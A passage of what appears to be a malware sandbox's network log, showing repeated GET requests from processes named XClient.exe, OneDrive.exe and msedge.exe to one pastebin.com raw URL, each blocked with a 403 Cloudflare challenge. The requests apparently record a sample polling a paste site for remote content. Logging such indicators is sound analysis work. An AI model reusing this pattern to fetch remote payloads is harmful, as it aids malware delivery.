Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: eUnyAnO8k4JQ+SjAMp/9kmcROehcXTGhZ6+5qqRwG1t5GnjouiwkPRvSmQlayun58fqQ0+pAAwI2PpGHFOY7hEJHA4xOj8GcnkDpgZR4AF0=$Be5GqC2VKuqgB9JWaV0vuA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454959f0b9467-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7221
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 2UAxc70/1vj9lRZHzu8E8qagxunUhImGxZoQbyTiQMvtoSbLMRxFr9fwu2R9+0JJ951dzRndlkKT8RQwLdQAin7yNNTovxd5v+44DRTobdo=$JL4opqzw6brgXNwFUuMJBQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454987befef4e-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: +TcXQXPhJ7Fzvs8ywjcJn4ID7ZbHoRjQdsP0L7p4zFy2bgnBrmsjfTj6nB8Onad2FtQwkpIwfc43PVEsGeqY2vaqcI3dXCoGP3gcgcuGggI=$PVGhRSSlgmHXwPoaatPcsw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454a70e6ded08-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: pQry8PoxgxsKVu9ON0fLwkOFr/42lrXxiQm6vroIyVOGotuj8IpfkWhRvQftxngKG0BhNOFn+qH/ouaAuZ2BVn07PQAe98KiaWHsqN2+y94=$nLDHyNekVJFyKIWY88OGww==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454a90e1e9481-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: N7ucF9aAEbWbTp6GByXK4o8OpvBiQkv9HSjywFmCbOrVh8FgA43aGJ33+ZecO5pZIdSBF+VSYUT7k8Csu+UMKuT2F6ISeO/ZB8VVuFnj1Qo=$RtlD3X+oX6Q/2V/sQIrZng==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454abdc5e93e3-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: SXRhAe4bdXvd/GyM5oGM71DHNj8FeUxZ3obIGSi6yaqFvRk0OGtD5WMDGE39a43oEFhNAiDtYhGnEbRpLdB9EkOOuZ4Abi3qt6Z3McvldGw=$55mA85ERwKswygYQ12eeNg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454ba6d3394f0-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: NNMFOUcki1KDTgmIe/8oduQjTn/Zv5RsoWLCS9oICMgZuklyXoas1uTFWaGOAU40+HULheOzqADXHCGco2BIP4oTJknWVyWCJJmsEAfa2Gw=$G9JWnxFZSNI7agjgJiwcag==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454bc5b05ef17-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: UwmLpmUImu+zXO+un5A7p7mw9z1oncDK+QiwgtkRnxoukboQz4F/Ry2/xqwHLR4pdSWzq4wikYkssjT55RJFUiVOIxBz+TjpXKi6RXu14FM=$R735wQSFVDzxeg15rDBepQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454bf4ed2d1f7-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: qNgWM+VV31gYsshmO90sGa7x19d+I1RnGJi8J4eC5JVzviVGeF+5a5bKnMBjmMYngWfbWGSd1vAyNy3XdSZ8NijR6Gd7L+yAcq/Q7fKH/54=$LvHiWVwDta6BZ9BMt3gwHA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454cdda806400-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7328
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 5xldH9xD+0ALnb5xzPU+/5Zy7VCFBCzf1J6rblrC3lHwPbvmYqxO8uHxgnVWC+aH1GTR6gMF4hlLzUqX2fIfhGM1EQF+mqu3JQNWHSD42Ro=$VM6RgShJ+T405Du/mkssxQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454cfaa9088a4-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: zzh8oYhvduRSE3n72YwH/SKQBa67CJ/zwNg41bTi9KLAZgV6icX+RLLZZfctE4GyjM+JO7UqdIuRLdo1Nnr+ynJCqdq/Z6AIJ0Zx/7nq4uk=$10uxyVfN0T6mvYghd3NOeA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454d2bda3654b-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 8ujzTbfuKwMMvhmGkqgA1UhsX+i6ynrxt++8n4/cm/Ek2CjihVXyxoNQl+PQL00ILW9C92dCEAh8ML2B8tAdjfX4zs3g+0x3w41GTXgZCsE=$8c6iQwUd6LbGBich9UN2FQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454e14afa77b2-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: rRokLHqx83valpZY6xGozDUs6LzQGdIzs6sTA3sJ6j0qZzp8Xu+egjLPJkYSzCmaw7lsiOd5F1PlB0Carh1ncJC8ixWQN6NZrnukK8qzl5k=$+LjKMLARv8I7Gd93AlRqIw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454e30df69545-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7307
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: p2v9HNqB4uxmoT8xaZ5/HoJYr51ubjqRzNZ/j8QwFj5AeBUtPoH+8J5kKNCOsKEqQKACOrAdk2nbuQURhVuTmNzrI20UmBw7w2e904zt11g=$ZyZTZ/Mic2p1ujPV1M8nBw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454e62cd0d170-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

